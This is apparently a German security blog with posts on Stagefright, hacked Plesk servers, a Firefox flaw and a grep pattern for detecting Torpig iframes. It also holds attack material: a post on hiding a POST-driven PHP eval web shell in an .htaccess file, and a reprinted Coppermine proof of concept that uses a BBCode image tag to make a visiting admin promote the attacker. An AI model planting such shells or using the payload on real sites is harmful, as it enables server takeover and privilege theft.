BotNetzProvider.de Ein Security Blog über Honig-Töpfe (honeypots) , Bots und Bitcoin

28Jul/153

„Stagefright“ possible remote code excecution – disable MMS how-to

STAGEFIGHT-ANDROID-HACK

Security researcher Joshua Drake from Zimperium zLabs announced what he called "he worst Android vulnerabilities discovered to date[...]"

Who can be infected?
Mostly all Android phones ranging from Android version 2.2 bis 5.1.1.
Unfortunately, the bugs found by Zimperium allow shellcode – executable instructions disguised as harmless multimedia data to take control of your device as soon as the content of a malicious message is downloaded.

This bug, as ZimPerium wrote on their blog, can infect around 950.000.000 devices all around the world.

MMS

The infection is spread mostly using MMS and Hangout as MMS/SMS handler.
It's not confirmed but it could be only Android Version < 4.1 are vulnerable to this MMS attack but it is recommended to disable MMS until full-disclosure.

Is there a fix for this vulnerability ?
Not yet, Google did release some fixes and will fix the issue after Joshia's full-disclosure on August 5 at the Black-Hat

CyanogenMod did fix the issue: The following CVE's have been patched in CM12.0

How can I disable MMS functionality ?
Here is a step-by-step instruction which shows you how to disable your MMS functionality:
(Please make backups of the IP addresses in case you want to enable MMS later)

Video (German + ENG subtitles)

Step-by-Step

droidAtScreen-1

droidAtScreen-2

droidAtScreen-3

droidAtScreen-4






droidAtScreen-5

droidAtScreen-6

droidAtScreen-7

1. make a backup of the IP addresses or URL
2. Change alle URL / IP addresses to: 127.0.0.1 - this will disable your MMS functionality

droidAtScreen-8

droidAtScreen-9

droidAtScreen-10






droidAtScreen-11

droidAtScreen-12

It would be great if someone could send me some pictures of an English version of this step-by-step process.

veröffentlicht unter: English, Exploits, news, Sicherheit 3 Kommentare
19Jun/130

Plesk 0day Exploit – KingCope –

Alle älteren Plesk Versionen 7.x bis 10.3.1 sind von dem Exploit betroffen und sind angreifbar.

Lösung:
Updaten Sie Ihr Plesk mindestens auf die sichere Version: 10.4.x oder 11.x
Diese Version ist von dieser speziellen Sicherheitslücke nicht betroffen!

Parallels Plesk hat auch einen Best Practices Guide zum Absichern von Plesk veröffentlicht: http://kb.parallels.com/en/114396/?show_at=de

Ist mein System gehackt?

Sofern Sie von Ihrem Provider eine Abuse E-Mail bekommen haben, ist es meist schon zu spät und man wurde Opfer des Hackerangriffs.

Des weiteren werden, nach einem erfolgreichen Angriff, Perl Skripte unter:

/tmp/
/var/tmp/

abgelegt.
Sofern sich dort ungewöhnliche Dateien befinden, sollte man einmal genauer seine Prozesse und offenen Verbindungen überprüfen.

Sollten Sie professionelle Hilfe benötigen:

ITS Netzwerk Services

Unser Service umfasst:

  • Schnelle Hilfe bei akuten Sicherheitsproblemen und Hackerangriffen
  • Sicherheitslücken in CMS (z.B. Joomla,Wordpress,etc) schließen
  • Langfristige Wartung und Administration Ihrer Systeme
  • Angriffsanalysen und Auswertungen der Angriffe
  • Bedrohungsanalysen
  • Sicherheitsüberprüfung Ihrer Systeme

Wenn Sie ein individuelles Angebot einholen möchten, schicken Sie uns eine E-Mail an: service@its-netzwerk.com oder besuchen Sie uns www.its-netzwerk.com

25Jul/120

Sicherheitlücke Plesk und deren Folgen

In den letzten Wochen ist viel rund um Plesk passiert.

Angefangen hat es mit einem Angebot von einer Hacker Gruppe, die für ein paar Tausend Dollar ein 0-Day Exploit für Plesk zum Verkauf angeboten hat. Zunächst wurde es als Hoax abgehandelt, bis schließlich die ersten gehackten Server aufgetaucht sind.

Laut Plesk handelt es sich wohl nicht um eine neue Sicherheitslücke, sondern um eine alt bekannte:

No, there is no new security problems in Plesk 10.4.4. The
vulnerability is the old one. Please refer to this article in our
knowledge base: http://kb.parallels.com/en/114330

The attack could occur on patched server if:

1) passwords were stolen previously when servers had a vulnerable
version of Plesk installed. If passwords were not changed using
http://kb.parallels.com/en/113391, then attackers could use them in
order to hack servers.

2) passwords were changed using http://kb.parallels.com/en/113391, but
some end-users changed their passwords back to old ones.

Man kann sich diesbezüglich nicht 100% sicher sein, aber die Analysen laufen noch.

Im Plesk Forum wird von Administratoren berichtet, die trotz des Einspielens der Sicherheitsupdates von Plesk und das Ändern sämtlicher Passwörter in kürzer wieder gehackt worden sind. Hier stellt sich die Frage, ob die Administratoren von Anfang an nach Backdoors und neu angelegten Usern gesucht haben?

Plesk Upgrade:
Seit dem 15.Juli 2012 hat Paralles Plesk ein wichtiges Sicherheitsupdates veröffentlicht für alle Plesk Versionen (v8-10) und Plesk 11 (nur für Windows). Leider wird nicht viel zu dem Update geschrieben, nur das es als „critical“ eingestuft wird und jeder installieren muss. Link

 

Wie kann ich feststellen, ob mein Server gehackt worden ist?

  • Produziert Ihr Server ungewöhnlich viel Traffic?
  • Reagiert er langsamer als normal
  • Hat Ihr Virenscanner verdächtige Dateien gefunden?

Oftmals werden von den Angreifern Cronjobs angelegt und können unter

$ ls /var/spool/cron/tabs/

eingesehen werden.
Gerne werden die Cronjobs als User www-data angelegt und rufen schadhafte Skripte auf.

Auch sollte man die Prozessausgabe „ps“ sich mal genauer ansehen, um ungewöhnliche Prozesse zu identifizieren.

Ein weiteres hilfreiches Tool zur Analyse ist „netstat“ mit dem man offene Verbindungen überprüfen kann.

Falls man mit der Analyse überfordert ist, oder nicht genau sicher ist sollte man sich professionielle Hilfe holen. Ein gehackter Server kann schnell zu vielen Problemen führen.

 

ITS Netzwerk Services

Unser Service umfasst:

  • Schnelle Hilfe bei akuten Sicherheitsproblemen und Hackerangriffen
  • Sicherheitslücken in CMS (z.B. Joomla,Wordpress,etc) schließen
  • Langfristige Wartung und Administration Ihrer Systeme
  • Angriffsanalysen und Auswertungen der Angriffe
  • Bedrohungsanalysen
  • Sicherheitsüberprüfung Ihrer Systeme

Wenn Sie ein individuelles Angebot einholen möchten, schicken Sie uns eine E-Mail an: service@its-netzwerk.com oder besuchen Sie uns www.its-netzwerk.com

1Jun/110

PHP-Shell in .htaccess Datei

Vor kurzem habe ich einen Artikel von Eldar Marcussen gelesen. Er schreibt über die Einbindung von einer PHP-Shell in eine ".htaccess" Datei. Den Ansatz den er verfolgt ist ziemlich interessant, nur leider verursacht seine PHP-Shell zu viel Lärm in der "access_logs" des Webservers.

Zunächst einmal muss man die Weiterleitungsregeln (rewrite) abändern, so dass die ".htaccess" Datei nicht ausgeführt wird und man diese als URL erreichen kann. Als nächstes bearbeiten wir die Datei so, dass der Inhalt als normaler dynamischer Inhalt wieder gegeben wird vom Webserver. Die PHP-Shell muss auskommentiert werden in der ".htaccess", damit der Apache erst die Direktive interpretiert und nicht den PHP Code. Sobald man nun die Datei im Browser aufruft, wird der PHP Code in den PHP Tags ausgeführt und man hat eine funktionierende PHP-Shell. Ich habe mich für eine PHP-Shell die man via POST aufruft entschieden, um den Lärm in den access-logs so gering wie möglich zu halten.

Beispiel .htaccess:

# Orginal von http://www.justanotherhacker.com 
# umgeschrieben von http://blog.botnetzprovider.de 

Order allow,deny
Allow from all

# Apache sagen bitte die .htaccess Datei als PHP interpretieren. 
AddType application/x-httpd-php .htaccess

# Botnetzprovider PHP-Shell
### php eval($_POST['botnetzprovider_sais']);  shell ist so nicht funktionsfähig #
13Mai/090

torpig/mebroot drive-by downloads erkennen via (z)grep

Für alle die Ihren Webspace durchsuchen wollen nach bösartigen IFRAMES hier ein kleiner String:
Dieser String ist gut für die meisten verschlüsselten Torpig/Mebroot IFRAMES.
SSH Zugang wird natürlich vorausgesetzt.
Im root Verzeichnis ausführen.

$ (z)grep -Rl 'function .(.){r="";for(i=0;i&lt;..length;i++){if(..charAt(i)=="."){..="%"}else{..=..cha' *

Natürlich keine Gewähr auf 100% Trefferquote, da es sich dabei um einen statistischen Link handelt. Ich habe aus 42 JavaScript IFRAMES dieses Pattern gebastelt. Grep oder zgrep müsst Ihr entscheiden, je nach Dateien.

28Mrz/090

Firefox Exploit – Risk: high

Art: XSL parsing remote memory corruption poc

Alle die Firefox in den folgenden Versionen nutzen

Mozilla Firefox 3.0.7
Mozilla Firefox 3.0.6
Mozilla Firefox 3.0.5
Mozilla Firefox 3.0.4
Mozilla Firefox 3.0.3
Mozilla Firefox 3.0.2
Mozilla Firefox 3.0.1
Mozilla Firefox 3.0

!Windows und Linux User!
sind gefährdet.

Erste Infos gab es dazu auf mailw0rm.

Laut Firefox wird es erst am 01.April ein Fix dazu geben.

Wie kann ich davor schützen:
1. NoScript installieren (Ein AddOn für Firefox) http://noscript.net/
Keine Skripte ausführen bis ein Fix von Firefox herausgegeben wurde.

Offizielle Infos von Firefox HIER

27Feb/090

Coppermine Photo Gallery <= 1.4.20 (BBCode IMG) Privilege Escalation

+--------------------------------------------------------------------------+
| Coppermine Photo Gallery <= 1.4.20 (BBCode IMG) Privilege Escalation PoC |
+--------------------------------------------------------------------------+
| by Juri Gianni aka yeat - staker[at]hotmail[dot]it |
| http://coppermine-gallery.net |
| Don't add me on msn messenger. |
| This vulnerability can be named as "bbcode img tag script injection" |
+--------------------------------------------------------------------------+
| Proof of Concept (an example,to understand it) |
+--------------------------------------------------------------------------+
URL: http://[host]/[path]/delete.php?id=u[ID]&u[ID]=&action=change_group&what=user&new_password=&group=1&delete_files=no&delete_comments=no
[img]URL[/img] +--------------------------------------------------------------------------+
| Modify [ID] with your user id. |
| Go http://[host]/[path]/displayimage.php?album=random&pos=[album id] |
+--------------------------------------------------------------------------+
Insert the below code into a new message

hey admin,nice web site 🙂
[img]http://[host]/[path]/delete.php?id=u3&u3=&action=change_group&what=user&new_password=&group=1&delete_files=no&delete_comments=no[/img]

+-------------------------------------------------------------------------+
| The fake image doesn't show errors,you'll see "hey admin,nice web site" |
| You'll become admin when the real admin will visit the page |
+-------------------------------------------------------------------------+

veröffentlicht unter: Exploits keine Kommentare
26Feb/094

w00tw00t.at.ISC.SANS.DFind

Schon seit längerem sind in den (Apache-)Logs meiner Server einige seltsame Zeilen zu finden (Ursprungs-IP wurde unkenntlich gemacht):

xxx.xxx.xxx.xxx - - [30/Sep/2007:12:48:33 +0200] “GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1″ 400 395 “-” “-”

Diese Zeilen sind der Fingerprint von DFind, einem vulnerability Scanner, der den Server auf Schwachstellen durchsucht. Bei Symantec kennt man das Tool als “Hacktool.DFind” - dort ist auch eine Liste von Schwachstellen, auf die das Programm mögliche Opfer testet.

In letzter Zeit häufen sich Angriffsversuche von IP’s, die aus Adressbereichen von Hostern kommen.

/* google like button API */